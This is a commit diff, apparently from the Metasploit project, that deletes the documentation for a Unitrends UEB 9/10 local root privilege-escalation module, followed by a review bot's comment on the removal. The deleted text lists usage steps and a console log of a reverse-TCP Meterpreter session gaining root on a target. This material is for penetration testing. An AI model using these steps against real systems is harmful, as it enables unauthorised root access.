ueb privesc updates
parent
4d65174f6d
commit
4af5ab3089
|
@ -1,38 +0,0 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Unitrends UEB 9/10 local privesc
|
||||
|
||||
This exploit leverages bpserverd proprietary protocol to issue commands
|
||||
as root.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Get a shell with exploit/linux/http/ueb10_api_systems
|
||||
2. ```use exploit/linux/local/ueb_priv_esc ```
|
||||
3. ```set session [SESSION]```
|
||||
4. ```exploit```
|
||||
5. A highpriv meterpreter session should have been opened successfully
|
||||
|
||||
## Scenarios
|
||||
|
||||
### UEB 10.0 on CentOS 6.5
|
||||
|
||||
```
|
||||
msf > use exploit/linux/local/ueb_priv_esc
|
||||
msf exploit(linux/local/ueb_priv_esc) > set session 4
|
||||
session => 4
|
||||
msf exploit(linux/local/ueb_priv_esc) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 15.0.0.177:4444
|
||||
[*] Writing payload executable to '/tmp/pEFoythF'
|
||||
[*] Writing privesc script to '/tmp/CTZSovJR'
|
||||
[*] Fixing permissions
|
||||
[*] Sending stage (857352 bytes) to 10.20.1.202
|
||||
[*] Meterpreter session 5 opened (15.0.0.177:4444 -> 10.20.1.202:45188) at 2018-04-27 16:44:28 -0400
|
||||
[+] Deleted /tmp/pEFoythF
|
||||
[+] Deleted /tmp/CTZSovJR
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: uid=0, gid=0, euid=0, egid=0
|
||||
|
||||
```
|
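Review bot: The hunk header (-1,38 +0,0) removes the entire module documentation, including the Verification Steps and the "UEB 10.0 on CentOS 6.5" scenario, and the commit message "ueb privesc updates" does not say why or where that content now lives. If the documentation is being moved or renamed along with the module, state that in the commit message and make sure the replacement file carries these sections over. If it is simply being dropped, exploit/linux/local/ueb_priv_esc is left without a documented verification path, so keep the file and update it in place instead.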